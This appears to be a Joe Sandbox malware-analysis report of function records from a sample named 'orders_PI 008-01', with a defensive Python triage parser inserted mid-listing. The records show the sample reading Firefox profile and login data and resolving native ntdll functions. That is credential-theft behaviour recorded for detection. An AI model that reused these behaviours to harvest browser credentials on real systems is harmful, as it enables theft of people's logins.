                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                        • EndDialog.USER32(?,?), ref: 0040135E
                                        • DeleteObject.GDI32(?), ref: 0040136A
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                        • ShowWindow.USER32(00000000), ref: 00401398
                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID:
                                        • API String ID: 829165378-0
                                        • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                        • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                        APIs
                                        • memset.MSVCRT ref: 00404172
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • wcscpy.MSVCRT ref: 004041D6
                                        • wcscpy.MSVCRT ref: 004041E7
                                        • memset.MSVCRT ref: 00404200
                                        • memset.MSVCRT ref: 00404215
                                        • _snwprintf.MSVCRT ref: 0040422F
                                        • wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 0040426E
                                        • memset.MSVCRT ref: 004042CD
                                        • memset.MSVCRT ref: 004042E2
                                        • _snwprintf.MSVCRT ref: 004042FE
                                        • wcscpy.MSVCRT ref: 00404311
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                        • API String ID: 2454223109-1580313836
                                        • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                        • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+Fw@FFw@BFw
                                        • API String ID: 667068680-2648589930
                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                        APIs
                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                        • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                        • API String ID: 4054529287-3175352466
                                        • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                        • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 3143752011-1996832678
                                        • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                        • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                        • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                        • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 1607361635-601624466
                                        • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                        • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                        • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                        • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintf$memset$wcscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 2000436516-3842416460
                                        • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                        • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                        APIs
                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                        • String ID:
                                        • API String ID: 1043902810-0
                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                        • _snwprintf.MSVCRT ref: 0044488A
                                        • wcscpy.MSVCRT ref: 004448B4
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@_snwprintfwcscpy
                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                        • API String ID: 2899246560-1542517562
                                        • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                        • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                        APIs
                                        • memset.MSVCRT ref: 0040DBCD
                                        • memset.MSVCRT ref: 0040DBE9
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                        • wcscpy.MSVCRT ref: 0040DC2D
                                        • wcscpy.MSVCRT ref: 0040DC3C
                                        • wcscpy.MSVCRT ref: 0040DC4C
                                        • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                        • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                        • wcscpy.MSVCRT ref: 0040DCC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                        • API String ID: 3330709923-517860148
                                        • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                        • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                        APIs
                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                        • memset.MSVCRT ref: 0040806A
                                        • memset.MSVCRT ref: 0040807F
                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                        • _wcsicmp.MSVCRT ref: 004081C3
                                        • memset.MSVCRT ref: 004081E4
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                          • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                          • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                        • String ID: logins$null
                                        • API String ID: 2148543256-2163367763
                                        • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                        • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                        • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                        • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
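The two records worth pulling out of this long function listing are the one whose String ID names Nt* exports and ntdll.dll (the sample resolves native APIs by name at runtime) and the one just above, which compares against "logins" and "null" and converts text through code page 0000FDE9, which is CP_UTF8. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the per-function record format shown on this page (the "APIs" / "Similarity" blocks with "•" bullets) and flags those two behaviours so the hashes can be carried into a hunt. The sample text is abridged from the records above; the record names, regexes and finding texts are mine, and reading "logins" plus UTF-8 conversion as a Firefox logins.json parser is an interpretation consistent with the report's WebBrowserPassView detection, not something the report states.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag triage indicators.

Added example for this report page; not Joe Sandbox code. The record layout
(section headers without a bullet, fields as "• Key: value") follows the
listing above, but the parser is an assumption fitted to that listing.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: two records abridged from the function listing above.
# The second record's "APIs" list is left empty because the page does not show it.
SAMPLE_REPORT = """\
APIs
• Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF), ref: 0040CC44
• memset.MSVCRT ref: 0040806A
• _wtoi.MSVCRT(00000000,00000000,00000136), ref: 004081AF
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000), ref: 00408218
Strings
Memory Dump Source
• Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: logins$null
• API String ID: 2148543256-2163367763
• Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
• Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
APIs
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+Fw@FFw@BFw
• API String ID: 667068680-2648589930
• Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
"""

# "• [Part of subcall function XXXX: ]Func.MODULE(args), ref: XXXX" or without parens
API_CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>[^\s.(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
)
# "• Key: value" lines in the Memory Dump Source / Similarity sections
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

CP_UTF8 = "0000FDE9"  # first argument of WideCharToMultiByte in the record above


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (function, module, [args])
    fields: dict = field(default_factory=dict)  # e.g. "String ID", "Opcode ID"

    def strings(self):
        """The '$'-separated String ID list, as individual strings."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_records(text):
    """Split the listing into records; every 'APIs' header starts a new one."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):          # section header
            section = line
            if section == "APIs":
                records.append(FunctionRecord())
            continue
        if not records:
            continue
        rec = records[-1]
        if section == "APIs":
            m = API_CALL_RE.match(line)
            if m:
                args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
                rec.apis.append((m.group("func"), m.group("module"), args))
        else:
            m = FIELD_RE.match(line)
            if m:
                rec.fields[m.group("key")] = m.group("val")
    return records


def triage(rec):
    """Return human-readable findings for one record (empty list if none)."""
    findings = []
    strings = rec.strings()
    # Nt* names next to "ntdll.dll" in the string pool: exports resolved by name.
    nt_names = [s for s in strings if re.fullmatch(r"Nt[A-Z]\w+", s)]
    if nt_names and "ntdll.dll" in (s.lower() for s in strings):
        findings.append("resolves ntdll exports by name at runtime: " + ", ".join(nt_names))
    # "logins" compared as text plus CP_UTF8 conversion: matches the layout of
    # Firefox's logins.json (assumption; the report only says browser credentials).
    utf8_conv = [f for f, _, args in rec.apis
                 if f in ("WideCharToMultiByte", "MultiByteToWideChar") and args[:1] == [CP_UTF8]]
    if "logins" in strings and utf8_conv:
        findings.append("parses a UTF-8 'logins' store (Firefox logins.json layout)")
    return findings


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE_REPORT), 1):
        print(f"record {i}: opcode id {rec.fields.get('Opcode ID', '?')[:16]}...")
        for finding in triage(rec):
            print("  -", finding)
```

The Opcode ID and Instruction Fuzzy Hash fields survive in `rec.fields`, so a flagged record's hashes can be fed straight into the similarity search across other reports; extend `triage` with further string or API patterns as the listing warrants.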
                                        APIs
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
